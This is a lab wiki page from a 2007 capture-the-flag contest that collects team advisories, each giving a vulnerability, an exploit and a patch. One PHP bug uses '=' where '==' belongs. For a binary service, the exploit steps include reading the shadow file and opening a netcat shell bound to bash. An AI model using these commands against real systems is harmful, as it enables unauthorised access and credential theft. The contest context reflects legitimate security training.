Advisories

Aus Labor für Echtzeitsysteme

Wechseln zu: Navigation, Suche
  • Advisories sollten regelmässig gelesen und befolgt werden!
  • Advisories sollten geschrieben werden? Eventuell dazu ein Webformular vorbereiten?

Aufbau von Advisories


Display Advisory


Advisory from 0x28 Pros on Service time Submitted at 19:21 12.07.2007 Score by rosebud with 2 scores.

Comment: "ok"


Advisory: There is a vulnerability in this service that reveals flags.


Exploit: Entering any start and stop time reveals a flag.


Patch:

Nice typo! Line 196 under work_functions.php should be
if ($userid==1) *not* 
if ($userid=1)


Display Advisory


Advisory from Hackerdom on Service rev Submitted at 20:02 12.07.2007 Score by Lexi with 4 scores.

Comment: "Excellent, why didn't you write it this way earlier? Finally we're getting somewhere"


Advisory:

problem description: at the place where the check for "exec" string is done, if it doesn't succed it tries ls, etc... if if succedes it tries help, etc. after patch the jump will be done to the place, where not "exec", not "ls", not etc... would go so you have to use some editor to change the logic of reveng


Exploit:

after doing the ssl connection you can do the following:

exec help
ls
cat shadow

or by numbers doing exec...

uname -a netstat -tapn
uptime
last
nohup /usr/bin/nc -l -r -e /bin/bash &
stty -a
ps fax

Patch: change

8049a23   0f853d010000                     jnz         loc_8049b66                                                                  

to

8049a23   e970010000                       jmp         loc_8049b98                                                                                                          
8049a28   90                               nop                           

Persönliche Werkzeuge